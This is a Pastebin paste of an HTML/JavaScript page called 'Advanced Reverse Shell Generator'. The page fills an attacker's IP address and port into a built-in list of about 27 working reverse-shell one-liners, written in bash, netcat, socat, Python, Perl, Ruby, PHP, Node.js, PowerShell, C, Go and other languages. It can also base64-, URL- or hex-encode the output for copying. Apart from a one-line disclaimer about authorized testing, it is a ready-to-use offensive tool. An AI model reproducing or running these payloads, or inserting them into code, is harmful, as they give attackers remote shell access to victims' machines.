API tools faq
paste
Sweetening

reverseshells.html

Sweetening
Jun 26th, 2025
104
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 31.14 KB | None | 0 0
raw download clone embed print report
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="UTF-8">
  5. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  6. <title>Advanced Reverse Shell Generator</title>
  7. <style>
  8. :root {
  9. --bg-color: #0a0a0a;
  10. --container-bg: #1a1a2e;
  11. --card-bg: #16213e;
  12. --input-bg: #0f3460;
  13. --text-color: #e94560;
  14. --primary-color: #e94560;
  15. --secondary-color: #ffffff;
  16. --success-color: #00ff88;
  17. --warning-color: #ffaa00;
  18. --error-color: #ff4444;
  19. --code-bg: #0c0c1e;
  20. --border-color: #e94560;
  21. --shadow-color: rgba(233, 69, 96, 0.3);
  22. }
  23.  
  24. * {
  25. box-sizing: border-box;
  26. }
  27.  
  28. body {
  29. font-family: 'Courier New', Courier, monospace;
  30. background: linear-gradient(135deg, var(--bg-color) 0%, #1a1a2e 100%);
  31. color: var(--secondary-color);
  32. margin: 0;
  33. padding: 20px;
  34. min-height: 100vh;
  35. }
  36.  
  37. .container {
  38. max-width: 1200px;
  39. margin: 0 auto;
  40. background-color: var(--container-bg);
  41. padding: 30px;
  42. border-radius: 15px;
  43. box-shadow: 0 0 30px var(--shadow-color);
  44. border: 2px solid var(--border-color);
  45. position: relative;
  46. overflow: hidden;
  47. }
  48.  
  49. .container::before {
  50. content: '';
  51. position: absolute;
  52. top: 0;
  53. left: 0;
  54. right: 0;
  55. height: 3px;
  56. background: linear-gradient(90deg, var(--primary-color), var(--success-color), var(--primary-color));
  57. animation: pulse 2s ease-in-out infinite;
  58. }
  59.  
  60. @keyframes pulse {
  61. 0%, 100% { opacity: 0.5; }
  62. 50% { opacity: 1; }
  63. }
  64.  
  65. h1 {
  66. color: var(--primary-color);
  67. text-align: center;
  68. text-shadow: 0 0 10px var(--primary-color);
  69. margin-bottom: 10px;
  70. font-size: 2.5rem;
  71. font-weight: bold;
  72. }
  73.  
  74. .disclaimer {
  75. font-size: 0.9em;
  76. text-align: center;
  77. color: var(--warning-color);
  78. margin-bottom: 30px;
  79. padding: 10px;
  80. background-color: rgba(255, 170, 0, 0.1);
  81. border-radius: 8px;
  82. border: 1px solid var(--warning-color);
  83. }
  84.  
  85. .form-section {
  86. background-color: var(--card-bg);
  87. padding: 25px;
  88. border-radius: 10px;
  89. margin-bottom: 25px;
  90. border: 1px solid var(--border-color);
  91. }
  92.  
  93. .form-row {
  94. display: grid;
  95. grid-template-columns: 1fr 1fr;
  96. gap: 20px;
  97. margin-bottom: 20px;
  98. }
  99.  
  100. .form-group {
  101. display: flex;
  102. flex-direction: column;
  103. }
  104.  
  105. .form-group.full-width {
  106. grid-column: 1 / -1;
  107. }
  108.  
  109. label {
  110. display: block;
  111. margin-bottom: 8px;
  112. color: var(--primary-color);
  113. font-weight: bold;
  114. font-size: 0.9rem;
  115. }
  116.  
  117. input[type="text"],
  118. input[type="number"],
  119. select {
  120. width: 100%;
  121. padding: 12px;
  122. background-color: var(--input-bg);
  123. border: 2px solid transparent;
  124. border-radius: 8px;
  125. color: var(--secondary-color);
  126. font-size: 1rem;
  127. transition: all 0.3s ease;
  128. }
  129.  
  130. input[type="text"]:focus,
  131. input[type="number"]:focus,
  132. select:focus {
  133. outline: none;
  134. border-color: var(--primary-color);
  135. box-shadow: 0 0 10px rgba(233, 69, 96, 0.3);
  136. }
  137.  
  138. input.error {
  139. border-color: var(--error-color);
  140. box-shadow: 0 0 10px rgba(255, 68, 68, 0.3);
  141. }
  142.  
  143. .error-message {
  144. color: var(--error-color);
  145. font-size: 0.8rem;
  146. margin-top: 5px;
  147. display: none;
  148. }
  149.  
  150. .checkbox-group {
  151. display: grid;
  152. grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
  153. gap: 15px;
  154. margin-top: 10px;
  155. }
  156.  
  157. .checkbox-item {
  158. display: flex;
  159. align-items: center;
  160. gap: 8px;
  161. }
  162.  
  163. input[type="checkbox"] {
  164. width: 18px;
  165. height: 18px;
  166. accent-color: var(--primary-color);
  167. }
  168.  
  169. .checkbox-item label {
  170. margin: 0;
  171. font-size: 0.9rem;
  172. cursor: pointer;
  173. }
  174.  
  175. button {
  176. padding: 15px 30px;
  177. background: linear-gradient(45deg, var(--primary-color), #ff6384);
  178. color: var(--secondary-color);
  179. border: none;
  180. border-radius: 8px;
  181. font-size: 1.1rem;
  182. font-weight: bold;
  183. cursor: pointer;
  184. transition: all 0.3s ease;
  185. text-transform: uppercase;
  186. letter-spacing: 1px;
  187. }
  188.  
  189. button:hover {
  190. transform: translateY(-2px);
  191. box-shadow: 0 5px 15px rgba(233, 69, 96, 0.4);
  192. }
  193.  
  194. button:active {
  195. transform: translateY(0);
  196. }
  197.  
  198. button:disabled {
  199. opacity: 0.6;
  200. cursor: not-allowed;
  201. transform: none;
  202. }
  203.  
  204. .generate-btn {
  205. width: 100%;
  206. margin-top: 20px;
  207. }
  208.  
  209. .clear-btn {
  210. background: linear-gradient(45deg, #666, #888);
  211. margin-left: 10px;
  212. padding: 10px 20px;
  213. font-size: 0.9rem;
  214. }
  215.  
  216. #output {
  217. margin-top: 30px;
  218. }
  219.  
  220. .output-header {
  221. display: flex;
  222. justify-content: space-between;
  223. align-items: center;
  224. margin-bottom: 20px;
  225. }
  226.  
  227. .output-stats {
  228. color: var(--success-color);
  229. font-size: 0.9rem;
  230. }
  231.  
  232. .shell-grid {
  233. display: grid;
  234. grid-template-columns: repeat(auto-fit, minmax(500px, 1fr));
  235. gap: 20px;
  236. }
  237.  
  238. .shell-card {
  239. background-color: var(--code-bg);
  240. border: 2px solid var(--border-color);
  241. border-radius: 10px;
  242. overflow: hidden;
  243. transition: all 0.3s ease;
  244. position: relative;
  245. }
  246.  
  247. .shell-card:hover {
  248. transform: translateY(-5px);
  249. box-shadow: 0 10px 25px var(--shadow-color);
  250. }
  251.  
  252. .shell-header {
  253. background: linear-gradient(45deg, var(--input-bg), var(--card-bg));
  254. padding: 15px 20px;
  255. font-weight: bold;
  256. color: var(--primary-color);
  257. border-bottom: 2px solid var(--border-color);
  258. display: flex;
  259. justify-content: space-between;
  260. align-items: center;
  261. }
  262.  
  263. .shell-category {
  264. font-size: 0.8rem;
  265. color: var(--success-color);
  266. background-color: rgba(0, 255, 136, 0.1);
  267. padding: 2px 8px;
  268. border-radius: 12px;
  269. }
  270.  
  271. .shell-command {
  272. padding: 20px;
  273. position: relative;
  274. }
  275.  
  276. .copy-btn {
  277. position: absolute;
  278. top: 15px;
  279. right: 15px;
  280. background: linear-gradient(45deg, var(--primary-color), #ff6384);
  281. color: white;
  282. border: none;
  283. padding: 8px 15px;
  284. border-radius: 6px;
  285. cursor: pointer;
  286. font-size: 0.8em;
  287. transition: all 0.2s;
  288. z-index: 10;
  289. }
  290.  
  291. .copy-btn:hover {
  292. transform: scale(1.05);
  293. }
  294.  
  295. .copy-btn.copied {
  296. background: linear-gradient(45deg, var(--success-color), #00cc66);
  297. }
  298.  
  299. pre {
  300. margin: 0;
  301. white-space: pre-wrap;
  302. word-wrap: break-word;
  303. padding-right: 80px;
  304. }
  305.  
  306. code {
  307. font-family: 'Courier New', Courier, monospace;
  308. color: var(--success-color);
  309. font-size: 0.9rem;
  310. line-height: 1.4;
  311. }
  312.  
  313. .encoding-info {
  314. background-color: var(--input-bg);
  315. padding: 10px;
  316. border-radius: 6px;
  317. margin-top: 10px;
  318. font-size: 0.8rem;
  319. color: var(--warning-color);
  320. }
  321.  
  322. .no-results {
  323. text-align: center;
  324. color: var(--warning-color);
  325. font-size: 1.2rem;
  326. margin: 40px 0;
  327. }
  328.  
  329. @media (max-width: 768px) {
  330. .form-row {
  331. grid-template-columns: 1fr;
  332. }
  333.  
  334. .shell-grid {
  335. grid-template-columns: 1fr;
  336. }
  337.  
  338. .container {
  339. padding: 20px;
  340. }
  341.  
  342. h1 {
  343. font-size: 2rem;
  344. }
  345. }
  346.  
  347. .loading {
  348. display: inline-block;
  349. width: 20px;
  350. height: 20px;
  351. border: 3px solid rgba(255,255,255,.3);
  352. border-radius: 50%;
  353. border-top-color: var(--primary-color);
  354. animation: spin 1s ease-in-out infinite;
  355. }
  356.  
  357. @keyframes spin {
  358. to { transform: rotate(360deg); }
  359. }
  360. </style>
  361. </head>
  362. <body>
  363.  
  364. <div class="container">
  365. <h1>Advanced Reverse Shell Generator</h1>
  366. <p class="disclaimer">
  367. ⚠️ For educational and authorized security testing purposes only.
  368. Ensure you have proper authorization before using these payloads.
  369. </p>
  370.  
  371. <div class="form-section">
  372. <div class="form-row">
  373. <div class="form-group">
  374. <label for="lhost">LHOST (Your IP Address):</label>
  375. <input type="text" id="lhost" placeholder="10.10.10.5" required>
  376. <div class="error-message" id="lhost-error">Please enter a valid IP address</div>
  377. </div>
  378. <div class="form-group">
  379. <label for="lport">LPORT (Your Port):</label>
  380. <input type="number" id="lport" placeholder="4444" min="1" max="65535" required>
  381. <div class="error-message" id="lport-error">Port must be between 1 and 65535</div>
  382. </div>
  383. </div>
  384.  
  385. <div class="form-row">
  386. <div class="form-group">
  387. <label for="encoding">Payload Encoding:</label>
  388. <select id="encoding">
  389. <option value="none">None (Plain Text)</option>
  390. <option value="base64">Base64 Encoding</option>
  391. <option value="url">URL Encoding</option>
  392. <option value="hex">Hex Encoding</option>
  393. </select>
  394. </div>
  395. <div class="form-group">
  396. <label for="shell-type">Shell Type Filter:</label>
  397. <select id="shell-type">
  398. <option value="all">All Types</option>
  399. <option value="scripting">Scripting Languages</option>
  400. <option value="system">System Commands</option>
  401. <option value="web">Web Languages</option>
  402. <option value="compiled">Compiled Languages</option>
  403. </select>
  404. </div>
  405. </div>
  406.  
  407. <div class="form-group full-width">
  408. <label>Select Payload Types:</label>
  409. <div class="checkbox-group" id="payload-checkboxes">
  410. <!-- Checkboxes will be generated dynamically -->
  411. </div>
  412. </div>
  413.  
  414. <div style="display: flex; align-items: center;">
  415. <button id="generateBtn" class="generate-btn">
  416. <span id="btn-text">Generate Payloads</span>
  417. <span id="btn-loading" class="loading" style="display: none;"></span>
  418. </button>
  419. <button id="clearBtn" class="clear-btn">Clear All</button>
  420. </div>
  421. </div>
  422.  
  423. <div id="output">
  424. <!-- Generated shells will be injected here -->
  425. </div>
  426. </div>
  427.  
  428. <script>
  429. document.addEventListener('DOMContentLoaded', () => {
  430. const lhostInput = document.getElementById('lhost');
  431. const lportInput = document.getElementById('lport');
  432. const encodingSelect = document.getElementById('encoding');
  433. const shellTypeSelect = document.getElementById('shell-type');
  434. const generateBtn = document.getElementById('generateBtn');
  435. const clearBtn = document.getElementById('clearBtn');
  436. const outputDiv = document.getElementById('output');
  437. const payloadCheckboxes = document.getElementById('payload-checkboxes');
  438.  
  439. // Enhanced payload database with categories
  440. const shells = [
  441. // System Commands
  442. { name: 'Bash - TCP', category: 'system', command: `bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1` },
  443. { name: 'Bash - UDP', category: 'system', command: `bash -i >& /dev/udp/{LHOST}/{LPORT} 0>&1` },
  444. { name: 'Netcat (classic)', category: 'system', command: `nc -e /bin/bash {LHOST} {LPORT}` },
  445. { name: 'Netcat (no -e)', category: 'system', command: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f` },
  446. { name: 'Netcat (OpenBSD)', category: 'system', command: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f` },
  447. { name: 'Socat', category: 'system', command: `socat tcp-connect:{LHOST}:{LPORT} exec:"bash -li",pty,stderr,setsid,sigint,sane` },
  448. { name: 'Telnet', category: 'system', command: `TF=$(mktemp -u);mkfifo $TF && telnet {LHOST} {LPORT} 0<$TF | /bin/sh 1>$TF` },
  449. { name: 'Awk', category: 'system', command: `awk 'BEGIN {s = "/inet/tcp/0/{LHOST}/{LPORT}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'` },
  450.  
  451. // Scripting Languages
  452. { name: 'Python 3', category: 'scripting', command: `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'` },
  453. { name: 'Python 2', category: 'scripting', command: `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` },
  454. { name: 'Python (Short)', category: 'scripting', command: `python -c 'import os,pty,socket;s=socket.socket();s.connect(("{LHOST}",{LPORT}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'` },
  455. { name: 'Perl', category: 'scripting', command: `perl -e 'use Socket;$i="{LHOST}";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'` },
  456. { name: 'Ruby', category: 'scripting', command: `ruby -rsocket -e'f=TCPSocket.open("{LHOST}",{LPORT}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'` },
  457. { name: 'Lua', category: 'scripting', command: `lua -e "require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');os.execute('/bin/sh -i <&3 >&3 2>&3');"` },
  458.  
  459. // Web Languages
  460. { name: 'PHP', category: 'web', command: `php -r '$sock=fsockopen("{LHOST}",{LPORT});exec("/bin/sh -i <&3 >&3 2>&3");'` },
  461. { name: 'PHP (Alternative)', category: 'web', command: `php -r '$sock=fsockopen("{LHOST}",{LPORT});shell_exec("/bin/sh -i <&3 >&3 2>&3");'` },
  462. { name: 'Node.js', category: 'web', command: `require('child_process').exec('nc -e /bin/sh {LHOST} {LPORT}')` },
  463. { name: 'Node.js (Alternative)', category: 'web', command: `(function(){var net = require("net"),cp = require("child_process"),sh = cp.spawn("/bin/sh", []);var client = new net.Socket();client.connect({LPORT}, "{LHOST}", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();` },
  464.  
  465. // Compiled Languages
  466. { name: 'Go', category: 'compiled', command: `echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{LHOST}:{LPORT}");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go` },
  467. { name: 'Java', category: 'compiled', command: `r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do \\$line 2>&5 >&5; done"] as String[]); p.waitFor()` },
  468. { name: 'C', category: 'compiled', command: `echo '#include <stdio.h>#include <sys/socket.h>#include <netinet/in.h>#include <arpa/inet.h>#include <unistd.h>int main(){int fd=socket(AF_INET,SOCK_STREAM,0);struct sockaddr_in addr;addr.sin_family=AF_INET;addr.sin_port=htons({LPORT});addr.sin_addr.s_addr=inet_addr("{LHOST}");connect(fd,(struct sockaddr*)&addr,sizeof(addr));dup2(fd,0);dup2(fd,1);dup2(fd,2);execve("/bin/sh",NULL,NULL);}' > /tmp/shell.c && gcc /tmp/shell.c -o /tmp/shell && /tmp/shell` },
  469.  
  470. // PowerShell
  471. { name: 'PowerShell (Modern)', category: 'system', command: `$client = New-Object System.Net.Sockets.TCPClient("{LHOST}",{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()` },
  472. { name: 'PowerShell (Base64)', category: 'system', command: `powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAewBMAEgATwBTAFQAfQAiACwAewBMAFAATwBSAFQAfQApAA==` },
  473.  
  474. // Additional payloads
  475. { name: 'Zsh', category: 'system', command: `zsh -c 'zmodload zsh/net/tcp && ztcp {LHOST} {LPORT} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'` },
  476. { name: 'Fish Shell', category: 'system', command: `fish -c 'set s (socket -t tcp {LHOST} {LPORT}); and exec /bin/sh <&$s >&$s 2>&$s'` },
  477. { name: 'Groovy', category: 'scripting', command: `String host="{LHOST}";int port={LPORT};String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();` }
  478. ];
  479.  
  480. // Initialize checkboxes
  481. function initializeCheckboxes() {
  482. const categories = [...new Set(shells.map(shell => shell.category))];
  483. const categoryNames = {
  484. 'system': 'System Commands',
  485. 'scripting': 'Scripting Languages',
  486. 'web': 'Web Languages',
  487. 'compiled': 'Compiled Languages'
  488. };
  489.  
  490. shells.forEach((shell, index) => {
  491. const checkboxItem = document.createElement('div');
  492. checkboxItem.className = 'checkbox-item';
  493. checkboxItem.innerHTML = `
  494. <input type="checkbox" id="shell-${index}" value="${index}" checked>
  495. <label for="shell-${index}">${shell.name}</label>
  496. `;
  497. payloadCheckboxes.appendChild(checkboxItem);
  498. });
  499. }
  500.  
  501. // Validation functions
  502. function validateIP(ip) {
  503. const ipRegex = /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;
  504. return ipRegex.test(ip) || ip === 'localhost' || /^[a-zA-Z0-9.-]+$/.test(ip);
  505. }
  506.  
  507. function validatePort(port) {
  508. const portNum = parseInt(port);
  509. return portNum >= 1 && portNum <= 65535;
  510. }
  511.  
  512. function showError(inputId, show = true) {
  513. const input = document.getElementById(inputId);
  514. const error = document.getElementById(inputId + '-error');
  515.  
  516. if (show) {
  517. input.classList.add('error');
  518. error.style.display = 'block';
  519. } else {
  520. input.classList.remove('error');
  521. error.style.display = 'none';
  522. }
  523. }
  524.  
  525. // Encoding functions
  526. function encodePayload(payload, encoding) {
  527. switch(encoding) {
  528. case 'base64':
  529. return btoa(payload);
  530. case 'url':
  531. return encodeURIComponent(payload);
  532. case 'hex':
  533. return payload.split('').map(c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
  534. default:
  535. return payload;
  536. }
  537. }
  538.  
  539. function getEncodingInfo(encoding) {
  540. switch(encoding) {
  541. case 'base64':
  542. return 'Base64 encoded - decode with: echo "payload" | base64 -d';
  543. case 'url':
  544. return 'URL encoded - can be used directly in web contexts';
  545. case 'hex':
  546. return 'Hex encoded - decode with: echo "payload" | xxd -r -p';
  547. default:
  548. return '';
  549. }
  550. }
  551.  
  552. function filterShells() {
  553. const shellType = shellTypeSelect.value;
  554. const selectedIndices = Array.from(document.querySelectorAll('#payload-checkboxes input[type="checkbox"]:checked'))
  555. .map(cb => parseInt(cb.value));
  556.  
  557. let filteredShells = shells.filter((shell, index) => selectedIndices.includes(index));
  558.  
  559. if (shellType !== 'all') {
  560. filteredShells = filteredShells.filter(shell => shell.category === shellType);
  561. }
  562.  
  563. return filteredShells;
  564. }
  565.  
  566. function generateShells() {
  567. const lhost = lhostInput.value.trim();
  568. const lport = lportInput.value.trim();
  569. const encoding = encodingSelect.value;
  570.  
  571. // Validation
  572. let hasErrors = false;
  573.  
  574. if (!lhost || !validateIP(lhost)) {
  575. showError('lhost', true);
  576. hasErrors = true;
  577. } else {
  578. showError('lhost', false);
  579. }
  580.  
  581. if (!lport || !validatePort(lport)) {
  582. showError('lport', true);
  583. hasErrors = true;
  584. } else {
  585. showError('lport', false);
  586. }
  587.  
  588. if (hasErrors) {
  589. return;
  590. }
  591.  
  592. // Show loading
  593. document.getElementById('btn-text').style.display = 'none';
  594. document.getElementById('btn-loading').style.display = 'inline-block';
  595. generateBtn.disabled = true;
  596.  
  597. // Simulate processing time
  598. setTimeout(() => {
  599. const filteredShells = filterShells();
  600.  
  601. if (filteredShells.length === 0) {
  602. outputDiv.innerHTML = '<div class="no-results">No payloads selected. Please select at least one payload type.</div>';
  603. return;
  604. }
  605.  
  606. outputDiv.innerHTML = `
  607. <div class="output-header">
  608. <h2 style="color: var(--primary-color); margin: 0;">Generated Payloads</h2>
  609. <div class="output-stats">${filteredShells.length} payload(s) generated</div>
  610. </div>
  611. <div class="shell-grid" id="shell-grid"></div>
  612. `;
  613.  
  614. const shellGrid = document.getElementById('shell-grid');
  615.  
  616. filteredShells.forEach(shell => {
  617. let finalCommand = shell.command
  618. .replace(/{LHOST}/g, lhost)
  619. .replace(/{LPORT}/g, lport);
  620.  
  621. const originalCommand = finalCommand;
  622. if (encoding !== 'none') {
  623. finalCommand = encodePayload(finalCommand, encoding);
  624. }
  625.  
  626. const categoryColors = {
  627. 'system': '#ff6b6b',
  628. 'scripting': '#4ecdc4',
  629. 'web': '#45b7d1',
  630. 'compiled': '#96ceb4'
  631. };
  632.  
  633. const shellCard = document.createElement('div');
  634. shellCard.className = 'shell-card';
  635. shellCard.innerHTML = `
  636. <div class="shell-header">
  637. <span>${shell.name}</span>
  638. <span class="shell-category" style="background-color: ${categoryColors[shell.category]}20; color: ${categoryColors[shell.category]}">${shell.category}</span>
  639. </div>
  640. <div class="shell-command">
  641. <button class="copy-btn" data-command="${escapeHtml(finalCommand)}">Copy</button>
  642. <pre><code>${escapeHtml(finalCommand)}</code></pre>
  643. ${encoding !== 'none' ? `<div class="encoding-info">${getEncodingInfo(encoding)}</div>` : ''}
  644. </div>
  645. `;
  646. shellGrid.appendChild(shellCard);
  647. });
  648.  
  649. // Hide loading
  650. document.getElementById('btn-text').style.display = 'inline';
  651. document.getElementById('btn-loading').style.display = 'none';
  652. generateBtn.disabled = false;
  653. }, 500);
  654. }
  655.  
  656. function escapeHtml(unsafe) {
  657. return unsafe
  658. .replace(/&/g, "&amp;")
  659. .replace(/</g, "&lt;")
  660. .replace(/>/g, "&gt;")
  661. .replace(/"/g, "&quot;")
  662. .replace(/'/g, "&#039;");
  663. }
  664.  
  665. function clearAll() {
  666. outputDiv.innerHTML = '';
  667. lhostInput.value = '';
  668. lportInput.value = '';
  669. encodingSelect.value = 'none';
  670. shellTypeSelect.value = 'all';
  671.  
  672. // Reset all checkboxes
  673. document.querySelectorAll('#payload-checkboxes input[type="checkbox"]').forEach(cb => {
  674. cb.checked = true;
  675. });
  676.  
  677. // Clear errors
  678. showError('lhost', false);
  679. showError('lport', false);
  680. }
  681.  
  682. // Event delegation for copy buttons
  683. outputDiv.addEventListener('click', (e) => {
  684. if (e.target.classList.contains('copy-btn')) {
  685. const button = e.target;
  686. const commandText = button.dataset.command;
  687.  
  688. navigator.clipboard.writeText(commandText).then(() => {
  689. button.textContent = 'Copied!';
  690. button.classList.add('copied');
  691. setTimeout(() => {
  692. button.textContent = 'Copy';
  693. button.classList.remove('copied');
  694. }, 2000);
  695. }).catch(err => {
  696. console.error('Failed to copy text: ', err);
  697. // Fallback for older browsers
  698. const textArea = document.createElement('textarea');
  699. textArea.value = commandText;
  700. document.body.appendChild(textArea);
  701. textArea.select();
  702. try {
  703. document.execCommand('copy');
  704. button.textContent = 'Copied!';
  705. button.classList.add('copied');
  706. setTimeout(() => {
  707. button.textContent = 'Copy';
  708. button.classList.remove('copied');
  709. }, 2000);
  710. } catch (err) {
  711. alert('Failed to copy text. Please copy manually.');
  712. }
  713. document.body.removeChild(textArea);
  714. });
  715. }
  716. });
  717.  
  718. // Event listeners
  719. generateBtn.addEventListener('click', generateShells);
  720. clearBtn.addEventListener('click', clearAll);
  721.  
  722. // Real-time validation
  723. lhostInput.addEventListener('input', () => {
  724. if (lhostInput.value.trim()) {
  725. showError('lhost', !validateIP(lhostInput.value.trim()));
  726. }
  727. });
  728.  
  729. lportInput.addEventListener('input', () => {
  730. if (lportInput.value.trim()) {
  731. showError('lport', !validatePort(lportInput.value.trim()));
  732. }
  733. });
  734.  
  735. // Enter key support
  736. [lhostInput, lportInput].forEach(input => {
  737. input.addEventListener('keypress', (e) => {
  738. if (e.key === 'Enter') {
  739. generateShells();
  740. }
  741. });
  742. });
  743.  
  744. // Initialize the application
  745. initializeCheckboxes();
  746. });
  747. </script>
  748.  
  749. </body>
  750. </html>
  751.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!